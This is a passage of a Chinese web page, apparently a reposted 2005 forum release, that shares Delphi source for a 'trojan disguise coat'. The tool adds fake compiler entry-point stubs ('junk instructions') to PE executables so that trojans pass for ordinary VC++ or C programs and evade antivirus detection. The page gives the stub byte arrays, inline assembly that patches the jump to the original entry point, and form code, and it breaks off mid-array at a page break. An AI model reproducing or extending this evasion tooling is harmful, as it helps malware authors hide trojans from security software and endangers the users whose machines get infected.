一个简单的花指令伪装器--Delphi版木马彩衣

附程序源码，有很多地方需要改进

下载地址：

http://forum.wrsky.com/viewthread.php?tid=2917&fpage=1

{pe花指令加密，参考 fi7ke 的 PE花指令加密一文
 Author:hnxyy QQ:19026695  2005.11.24

说明：以VC++6的花指令为例说明

//VC++6外衣 1
OEPCODEFIVE: THEAD =
($55, $8B, $EC, $6A, $FF, $68, $00, $00, $00, $00, $68, $00, $00, $00, $00, $64,
 $A1, $00, $00, $00, $00, $50, $64, $89, $25, $00, $00, $00, $00, $83, $EC, $68,
 $53, $56, $57, $58, $58, $58, $83, $C4, $68, $58, $67, $64, $A3, $00, $00, $58,
 $58, $58, $58, $8B, $E8, $E9, $07, $B9, $FE, $FF, $00, $00, $00, $00, $00, $00);

 //VC++6外衣 2
OEPCODEFIVE: THEAD =
($55, $8B, $EC, $6A, $FF, $68, $00, $00, $00, $00, $68, $00, $00, $00, $00, $64,
 $A1, $00, $00, $00, $00, $50, $64, $89, $25, $00, $00, $00, $00, $83, $EC, $68,
 $53, $56, $57, $58, $58, $58, $83, $C4, $68, $58, $67, $64, $A3, $00, $00, $58,
 $58, $58, $58, $8B, $E8, $B8, $00, $10, $40, $00, $FF, $E0, $90, $00, $00, $00);

1.直接将入口地址赋给寄存器eax,然后jmp eax
0046902A     B8 304A4500   mov eax,Project1.00454A30
0046902F     FFE0          jmp eax
00469031     90            nop
2. 直接跳转到入口地址
00469124   - E9 07B9FEFF   jmp Project1.00454A30
两种效果实际上是一样的,但我们为了方便修改花指令跳转到原来的入口地址，通常取得原
pe header的AddressOfEntryPoint,然后给寄存器eax保存改值，所以第二种方法就不太方便，
所以一般采用第一种方法，JMPOFF为花指令代码到跳转指令的偏移，如对Visual C++的花指令
JMPOFF=54,其后免跟的是原入口地址，可以随便填写，程序加花指令是会自动修改，一般可以
默认设为00104000(即00401000).
通过汇编修改花指令跳转原入口地址的语句:
asm   //这里说明一下，这是嵌入的汇编代码,寄存器—CPU暂时储存数据的东西，比内存更快，以提高效率
  PUSHAD
  LEA eax, OEPCODE  //将OEPCODE的地址交给寄存器
  ADD eax, JMPOFF   //添加JMPOFF值给寄存器
  MOV edx, AddressOfEntryPoint   //转移指令，相当于付值语句，左边给右边
  MOV DWORD ptr [eax], edx    //同上
  POPAD
end;
}
unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, ExtCtrls, ShellAPI;

type
  TForm1 = class(TForm)
    Label1: TLabel;
    Edit1: TEdit;
    Button1: TButton;
    RadioGroup1: TRadioGroup;
    Label2: TLabel;
    Edit2: TEdit;
    Label3: TLabel;
    Edit3: TEdit;
    CheckBox1: TCheckBox;
    Button2: TButton;
    Label5: TLabel;
    OpenDialog1: TOpenDialog;
    Label4: TLabel;
    procedure Button1Click(Sender: TObject);
    procedure obtain;
    procedure Button2Click(Sender: TObject);
    procedure Label4Click(Sender: TObject);
    procedure Edit3KeyPress(Sender: TObject; var Key: Char);
  private
    { Private declarations }
    FImageBase: DWORD;
    procedure SetOepCode;
  public
    { Public declarations }
  end;

  THEAD = array[0..63] of byte;

var
  Form1: TForm1;

const
  {MYSECTION = ''''Fi7ke'''';  //添加的节名，自定义
  JMPOFF = 43;  //花指令的机器码,Ollydbg加载后随便取
  //Microsoft Visual C++
  OEPCODE: THEAD =
   ($55, $8B, $EC, $6A, $FF, $68, $2A, $2C, $0A, $00, $68, $38,
    $90, $0D, $00, $64, $A1, $00, $00, $00, $00, $50, $64, $89,
    $25, $00, $00, $00, $00, $58, $64, $A3, $00, $00, $00, $00,
    $58, $58, $58, $58, $8B, $E8, $B8, $00, $10, $40, $00, $FF,
    $E0, $90, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
    $00, $00, $00, $00);     }

    //Nothing found * one
    OEPCODEONE: THEAD =
    ($55, $8B, $EC, $83, $C4, $F4, $83, $C4, $0C, $B8, $00, $10, $40, $00, $50, $C3,
     $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
     $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
     $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00);

    //Nothing found *  two
    OEPCODETWO: THEAD =
    ($55, $8B, $EC, $41, $52, $90, $5A, $49, $5D, $41, $B8, $00, $10, $40, $00, $FF,
     $E0, $90, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
     $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
     $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00);

    //VC++外衣
    OEPCODETHREE: THEAD =
    ($55, $8B, $EC, $6A, $FF, $68, $2A, $2C, $0A, $00, $68, $38, $90, $0D, $00, $64,
     $A1, $00, $00, $00, $00, $50, $64, $89, $25, $00, $00, $00, $00, $58, $64, $A3,
     $00, $00, $00, $00, $58, $58, $58, $58, $8B, $E8, $B8, $00, $10, $40, $00, $FF,
     $E0, $90, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00);

    //VC++5外衣
    OEPCODEFOUR: THEAD =
    ($55, $8B, $EC, $6A, $FF, $68, $48, $54, $41, $00, $68, $A8, $21, $40, $00, $64,
     $A1, $00, $00, $00, $00, $50, $64, $89, $25, $00, $00, $00, $00, $83, $C4, $94,
     $53, $56, $57, $00, $00, $B8, $00, $10, $40, $00, $FF, $E0, $90, $00, $00, $00,
     $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00);

     //VC++6外衣
    OEPCODEFIVE: THEAD =
    ($55, $8B, $EC, $6A, $FF, $68, $00, $00, $00, $00, $68, $00, $00, $00, $00, $64,
     $A1, $00, $00, $00, $00, $50, $64, $89, $25, $00, $00, $00, $00, $83, $EC, $68,
     $53, $56, $57, $58, $58, $58, $83, $C4, $68, $58, $67, $64, $A3, $00, $00, $58,
     $58, $58, $58, $8B, $E8, $B8, $00, $10, $40, $00, $FF, $E0, $90, $00, $00, $00);

    //C外衣
    OEPCODESIX: THEAD =
    ($55, $8B, $EC, $6A, $FF, $68, $11, $11, $11, $00, $68, $22, $22, $22, $00, $64,
     $A1, $00, $00, $00, $00, $50, $64, $89, $25, $00, $00, $00, $00, $58, $64, $A3,
     $00, $00, $00, $00, $58, $58, $58, $58, $8B, $E8, $B8, $00, $10, $40, $00, $FF,
     $E0, $90, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00);

   OepCount = 6;

  //OEPCODEARRAY :array[0..OepCount-1,0..63] of byte=(
  //OEPCODEARRAY :array[0..OepCount-1] of array[0..63] of byte=(
  OEPCODEARRAY :array[0..OepCount-1] of THEAD=(
    ($55, $8B, $EC, $83, $C4, $F4, $83, $C4, $0C, $B8, $00, $10, $40, $00, $50, $C3,
     $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
     $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
     $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00),  //Nothing found *  one
    ($55, $8B, $EC, $6A, $FF, $68, $2A, $2C, $0A, $00, $68, $38, $90, $0D, $00, $64,
     $A1, $00, $00, $00, $00, $50, $64, $89, $25, $00, $00, $00, $00, $58, $64, $A3,
     $00, $00, $00, $00, $58, $58, $58, $58, $8B, $E8, $B8, $00, $10, $40, $00, $FF,
     $E0, $90, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00),  //VC++外衣
    ($55, $8B, $EC, $6A, $FF, $68, $48, $54, $41, $00, $68, $A8, $21, $40, $00, $64,
     $A1, $00, $00, $00, $00, $50, $64, $89, $25, $00, $00, $00, $00, $83, $C4, $94,
     $53, $56, $57, $00, $00, $B8, $00, $10, $40, $00, $FF, $E0, $90, $00, $00, $00,
     $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00),  //VC++5外衣
    ($55, $8B, $EC, $6A, $FF, $68, $00, $00, $00, $00, $68, $00, $00, $00, $00, $64,
     $A1, $00, $00, $00, $00, $50, $64, $89, $25, $00, $00, $00, $00, $83, $EC, $68,
     $53, $56, $57, $58, $58, $58, $83, $C4, $68, $58, $67, $64, $A3, $00, $00, $58,
     $58, $58, $58, $8B, $E8, $B8, $00, $10, $40, $00, $FF, $E0, $90, $00, $00, $00),  //VC++6外衣
    ($55, $8B, $EC, $6A, $FF, $68, $11, $11, $11, $00, $68, $22, $22, $22, $00, $64,
     $A1, $00, $00, $00, $00, $50, $64, $89, $25, $00, $00, $00, $00, $58, $64, $A3,
     $00, $00, $00, $00, $58, $58, $58, $58, $8B, $E8, $B8, $00, $10, $40, $00, $FF,
     $E0, $90, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00),   //C外衣
    ($55, $8B, $EC, $41, $52, $90, $5A, $49, $5D, $41, $B8, $00, $10, $40, $00, $FF,
     $E0, $90, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
     $00, $00, $00, $00, $00, $00, $00, $00, $0

[1] [2] [3] [4]  下一页

Copyright ＠ 2007-2012 敏韬网(敏而好学，文韬武略--MinTao.Net)（学习笔记） Inc All Rights Reserved.
闵涛 E_mail:admin@mintao.net(欢迎提供学习资源)

鄂公网安备 42011102001154号

站长：MinTao ICP备案号：鄂ICP备11006601号-18